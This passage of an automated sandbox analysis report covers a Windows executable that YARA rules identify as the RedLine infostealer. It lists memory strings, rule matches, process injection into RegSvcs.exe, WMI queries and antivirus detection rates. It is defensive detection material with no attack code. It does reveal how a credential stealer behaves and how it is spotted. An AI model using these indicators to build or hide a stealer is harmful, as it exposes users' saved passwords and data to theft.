                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: yGu4YUwMl6.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7452, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_02415E280_2_02415E28
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050BD4000_2_050BD400
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050BB7880_2_050BB788
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B47B00_2_050B47B0
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B47C00_2_050B47C0
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B00060_2_050B0006
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B00400_2_050B0040
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B13010_2_050B1301
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B13100_2_050B1310
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050BB3500_2_050BB350
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B3D180_2_050B3D18
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050BBFF80_2_050BBFF8
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050BBBB10_2_050BBBB1
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050BBBC00_2_050BBBC0
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B4A9B0_2_050B4A9B
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeCode function: 0_2_050B4AA80_2_050B4AA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00ECE7B03_2_00ECE7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00ECDC903_2_00ECDC90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EB44683_2_05EB4468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EB96303_2_05EB9630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EBD3A03_2_05EBD3A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EB33203_2_05EB3320
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EB12103_2_05EB1210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EBDD183_2_05EBDD18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05EBDA2E3_2_05EBDA2E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D67D83_2_068D67D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068DF2A73_2_068DF2A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068DF2B83_2_068DF2B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D91003_2_068D9100
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D988B3_2_068D988B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068D98983_2_068D9898
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769015714.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000000.1714641699.00000000002A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZPVX.exe> vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769436422.0000000003E7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1772900233.0000000007380000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1768314487.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1769436422.0000000003668000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771296362.0000000005040000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exeBinary or memory string: OriginalFilenameZPVX.exe> vs yGu4YUwMl6.exe
                    Source: yGu4YUwMl6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: yGu4YUwMl6.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7452, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: yGu4YUwMl6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, rKnfCKVTBvUrY1HLXt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, rKnfCKVTBvUrY1HLXt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, rKnfCKVTBvUrY1HLXt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.yGu4YUwMl6.exe.405b0e8.1.raw.unpack, rKnfCKVTBvUrY1HLXt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, rKnfCKVTBvUrY1HLXt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, rKnfCKVTBvUrY1HLXt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.yGu4YUwMl6.exe.3fff2c8.4.raw.unpack, RrnBpqQBaojddDD8hq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/44@1/2
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yGu4YUwMl6.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMutant created: \Sessions\1\BaseNamedObjects\oFxCUwaqawcEspjS
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1596.tmpJump to behavior
                    Source: yGu4YUwMl6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: yGu4YUwMl6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, tmp4D49.tmp.3.dr, tmp4D37.tmp.3.dr, tmp4D36.tmp.3.dr, tmp4D15.tmp.3.dr, tmp4D26.tmp.3.dr, tmp4D48.tmp.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: yGu4YUwMl6.exeVirustotal: Detection: 70%
                    Source: yGu4YUwMl6.exeReversingLabs: Detection: 71%
                    Source: unknownProcess created: C:\Users\user\Desktop\yGu4YUwMl6.exe "C:\Users\user\Desktop\yGu4YUwMl6.exe"
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeSection loaded: apphelp.dllJump to behavior
